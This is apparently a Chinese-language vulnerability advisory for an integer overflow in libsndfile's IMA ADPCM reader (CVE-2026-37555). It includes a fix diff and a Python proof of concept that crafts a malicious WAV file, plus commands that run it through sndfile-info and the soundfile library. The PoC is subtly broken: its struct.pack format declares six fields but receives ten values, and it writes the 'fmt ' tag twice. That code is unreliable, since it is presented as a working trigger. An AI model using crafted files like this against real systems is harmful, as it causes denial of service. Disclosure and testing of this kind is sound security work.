### 漏洞概述 - **CVE编号**: CVE-2026-37555 - **受影响版本**: libsndfile ≤ 1.2.2(最新发行版) - **漏洞类型**: CWE-190(整数溢出或环绕) - **CVSS评分**: 3.1 (AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) - **报告者**: Feng Ning, Innora Security Research ### 影响范围 - 两个32位乘法溢出在 `src/ima_adpcm.c` 中,允许通过构造的WAV或W64文件损坏 `psf->sf.frames` 为负值或零值。 - AIFF代码路径在CVE-2022-33065中已显式转换 `sf_count_t`,但WAV读取器和写入关闭路径未处理。 - 构造的WAV/W64文件包含大 `samplesperblock * blocks` 值,可能导致缓冲区分配或迭代循环读取或写入越界,最终导致异常终止(DoS)。 ### 修复方案 - 对受影响的两个路径应用相同的 `sf_count_t` 转换,已在AIFF路径中实现。 - 具体修复代码: ```c // Line 235 — WAV/W64 path - psf->sf.frames = pima->samplesperblock * pima->blocks ; + psf->sf.frames = (sf_count_t) pima->samplesperblock * pima->blocks ; // Line 167 — ima_close write path - psf->sf.frames = pima->samplesperblock * pima->blockcount / psf->sf.channels ; + psf->sf.frames = (sf_count_t) pima->samplesperblock * pima->blockcount / psf->sf.channels ; ``` ### Proof of Concept (POC) ```python import struct def make_wav_ima(samplesperblock, blocks): # IMA ADPCM WAV with crafted header values channels = 1 blockalign = (samplesperblock - 1) // 2 + 4 fmt = struct.pack('<4sIHHHH', b'fmt ', 0x0011, channels, 8000, blockalign, blockalign, 4, 2, samplesperblock ) data_size = blockalign * blocks wav = (b'RIFF' + struct.pack('<I', 36 + len(fmt) + 8 + data_size) + b'WAVEfmt ' + struct.pack('<I', len(fmt)) + fmt + b'data' + struct.pack('<I', data_size) + b'\x00' * data_size) return wav with open('overflow.wav', 'wb') as f: f.write(make_wav_ima(50000, 50000)) $ sndfile-info overflow.wav $ python3 -c "import soundfile; soundfile.info('overflow.wav')" # triggers integer overflow in ima_reader_init / ima_close ```